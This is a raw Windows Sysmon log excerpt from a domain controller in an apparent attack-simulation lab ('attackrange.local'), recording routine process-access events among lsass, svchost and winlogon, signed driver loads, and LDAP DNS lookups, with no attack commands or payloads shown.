10:40:25.104{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002384Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:25.072{733EE690-3DF7-5F80-0B00-000000007F01}8683540C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+70fae|C:\Windows\system32\lsass.exe+3907|C:\Windows\SYSTEM32\ntdll.dll+80a84|C:\Windows\SYSTEM32\ntdll.dll+29c02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 644600x80000000000000002394Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:50.151C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000002393Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.073C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000002392Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:50.151C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 22542200x80000000000000002391Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:25.760{733EE690-3DF9-5F80-1500-000000007F01}1356_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002390Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:25.760{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 10341000x80000000000000002397Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:30.166{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002396Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:30.166{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002395Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:30.166{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002485Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1700-000000007F01}1828C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002484Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1300-000000007F01}1252C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002483Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002482Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002481Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0F00-000000007F01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002480Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-1000-000000007F01}11322192C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+45079|C:\Windows\SYSTEM32\ntdll.dll+29bfa|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002479Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-1000-000000007F01}11321632C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002478Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002477Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-1000-000000007F01}11322192C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+45079|C:\Windows\SYSTEM32\ntdll.dll+29bfa|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002476Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-1000-000000007F01}11321632C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002475Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002474Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002473Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002472Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002471Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002470Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002469Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002468Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.978{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 644600x80000000000000002467Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:51.073C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 644600x80000000000000002466Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:50.495C:\Windows\System32\drivers\xennet.sysMD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34trueAmazon Web Services, Inc.Valid 10341000x80000000000000002465Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 